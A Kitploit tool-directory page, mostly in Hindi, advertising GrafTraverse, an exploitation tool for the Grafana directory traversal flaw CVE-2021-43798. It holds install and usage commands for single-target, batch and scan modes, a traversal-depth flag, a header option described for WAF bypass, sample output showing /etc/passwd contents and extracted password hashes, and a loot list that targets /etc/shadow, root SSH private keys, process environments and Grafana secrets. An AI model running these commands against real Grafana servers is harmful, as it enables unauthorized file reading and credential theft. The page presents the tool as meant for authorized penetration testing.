Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi शोषण ढांचा | Kitploit
उपकरण/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi शोषण ढांचा

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GrafTraverse - CVE-2021-43798 लघु शोषण ढांचा

Grafana निर्देशिका ट्रैवर्सल (CVE-2021-43798) के अधिकृत सुरक्षा परीक्षण के लिए कमांड-लाइन स्वचालन उपकरण।


अवलोकन

Banner

CVE-2021-43798 Grafana 8.x में एक अप्रमाणित निर्देशिका ट्रैवर्सल भेद्यता है जो हमलावरों को /public/plugins/ एंडपॉइंट के माध्यम से अंतर्निहित फाइल सिस्टम पर मनमानी फाइलें पढ़ने की अनुमति देती है। मूल कारण प्लगइन एसेट अनुरोधों पर अनुचित पथ स्वच्छता है, जो ../ अनुक्रमों को इच्छित निर्देशिका से बचने में सक्षम बनाती है।

GrafTraverse मूल प्रूफ-ऑफ-कॉन्सेप्ट का पूर्ण पुनर्लेखन है। यह महत्वपूर्ण अनुरोध-हैंडलिंग बग को ठीक करता है, मल्टी-थ्रेडेड बैच स्कैनिंग, स्वचालित प्लगइन खोज, क्रेडेंशियल निष्कर्षण और संरचित रिपोर्टिंग जोड़ता है — जो इसे रेड टीमों और पेनिट्रेशन परीक्षकों के लिए एक उत्पादन-ग्रेड उपकरण बनाता है।


विशेषताएं


स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Ensure requests is available (it ships with Kali)
pip3 install requests

# Make executable
chmod +x GrafTraverse.py

उपयोग

GrafTraverse एक उप-कमांड-आधारित CLI का उपयोग करता है। सभी कमांड --help का समर्थन करते हैं।

1. इंटरैक्टिव एकल लक्ष्य

एक होस्ट के विरुद्ध इंटरैक्टिव मेनू लॉन्च करें:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. प्लगइन स्कैन

शोषण के बिना जल्दी से पहचानें कि कौन सा प्लगइन एंडपॉइंट भेद्य है:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. बैच स्कैनिंग

एक फ़ाइल से लक्ष्य लोड करें और उन्हें एक साथ प्रोसेस करें:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

targets.txt फ़ॉर्मेट:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Lines starting with # are ignored

4. वर्डलिस्ट गणना

गहन ट्रैवर्सल के लिए कस्टम फ़ाइल सूची फ़ीड करें:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. प्रॉक्सी और कस्टम हेडर

Burp Suite के माध्यम से रूट करें और कस्टम हेडर जोड़ें:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

कमांड संदर्भ

single

batch

फ्लैगविवरण
-l, --listलक्ष्य URL वाली फ़ाइल (आवश्यक)
--workersएक साथ थ्रेड (डिफ़ॉल्ट: 5)
(सभी single फ्लैग समर्थित हैं)

scan

फ्लैगविवरण
-u, --urlलक्ष्य URL (आवश्यक)
(सभी नेटवर्क फ्लैग समर्थित हैं)

उदाहरण आउटपुट

सफल फ़ाइल पुनर्प्राप्ति

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Grafana DB हैश निष्कर्षण

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

लक्ष्य फ़ाइलें (स्वचालित लूट)

अंतर्निहित लूट अनुक्रम निम्नलिखित फ़ाइलों को क्रम में पुनर्प्राप्त करने का प्रयास करता है:


प्रभावित संस्करण

  • Grafana 8.0.0 से 8.3.0 तक
  • 8.3.1 और 7.5.12 में पैच किया गया
टूल डाउनलोड करें
विशेषताविवरण
बहु-प्लगइन ब्रूट-फोर्सस्वचालित रूप से 40 से अधिक अंतर्निहित प्लगइनों की जांच करता है ताकि एक भेद्य पथ खोजा जा सके
इंटरैक्टिव मोडमेनू-संचालित एकल-लक्ष्य शोषण जिसमें लाइव फ़ाइल पूर्वावलोकन शामिल है
बैच मोडकॉन्फ़िगरेबल थ्रेड वर्कर्स के साथ एक साथ बहु-लक्ष्य स्कैनिंग
वर्डलिस्ट मोडकस्टम वर्डलिस्ट का उपयोग करके गहन फ़ाइल गणना
स्वचालित हैश निष्कर्षणडाउनलोड किए गए grafana.db से PBKDF2 पासवर्ड हैश को स्वचालित रूप से निकालता है
संरचित लॉगिंगरिपोर्टिंग के लिए परिणामों को JSON और CSV में निर्यात करें
प्रॉक्सी सपोर्टBurp, ZAP, या किसी भी HTTP प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें (--proxy)
कस्टम हेडरWAF बाइपास या ऑथ टोकन के लिए मनमाने हेडर इंजेक्ट करें (-H)
ट्रैवर्सल अनुकूलनगैर-मानक वातावरण के लिए डिफ़ॉल्ट ट्रैवर्सल गहराई ओवरराइड करें (--depth)
स्मार्ट फ़िल्टरिंगप्लगइन JS/CSS/HTML प्रतिक्रियाओं को अस्वीकार करके झूठी-सकारात्मकता को समाप्त करता है
शून्य निर्भरताकेवल requests की आवश्यकता है (Kali/Parrot पर पूर्व-स्थापित)
फ्लैगविवरण
-u, --urlलक्ष्य URL (आवश्यक)
--no-downloadकेवल-दृश्य मोड, फ़ाइलें सहेजें नहीं
-t, --timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--proxyHTTP/HTTPS प्रॉक्सी URL
-H, --headerकस्टम हेडर (दोहराने योग्य)
--depthट्रैवर्सल स्ट्रिंग (डिफ़ॉल्ट: ../../../../../../../../)
--output-dirपुनर्प्राप्त फ़ाइलों को सहेजने के लिए निर्देशिका
--jsonJSON लॉग फ़ाइल में परिणाम जोड़ें
--csvCSV लॉग फ़ाइल में परिणाम जोड़ें
--wordlistगणना करने के लिए पथ वाली फ़ाइल
--pluginकिसी विशिष्ट प्लगइन नाम को बलपूर्वक उपयोग करें
फ़ाइलप्रकारसंवेदनशीलता
/etc/passwdपाठउपयोगकर्ता गणना
/etc/shadowपाठपासवर्ड हैश (शायद ही पढ़ने योग्य)
/etc/hostsपाठनेटवर्क टोपोलॉजी
/etc/hostnameपाठहोस्ट पहचान
/etc/grafana/grafana.iniपाठGrafana रहस्य और DB क्रेडेंशियल
/var/lib/grafana/grafana.dbबाइनरीउपयोगकर्ता हैश और API कुंजियों वाली SQLite DB
/var/log/grafana/grafana.logपाठपरिचालन खुफिया जानकारी
/root/.ssh/id_rsaपाठSSH निजी कुंजी
/root/.ssh/authorized_keysपाठकुंजी-आधारित एक्सेस मैपिंग
/proc/self/environपाठप्रक्रिया पर्यावरण चर
/proc/self/cmdlineपाठप्रक्रिया तर्क
/proc/versionपाठकर्नेल संस्करण
/proc/mountsपाठफ़ाइल सिस्टम लेआउट
/etc/os-releaseपाठOS पहचान
/etc/issueपाठOS पहचान
/etc/crontabपाठअनुसूचित कार्य
/etc/resolv.confपाठDNS कॉन्फ़िगरेशन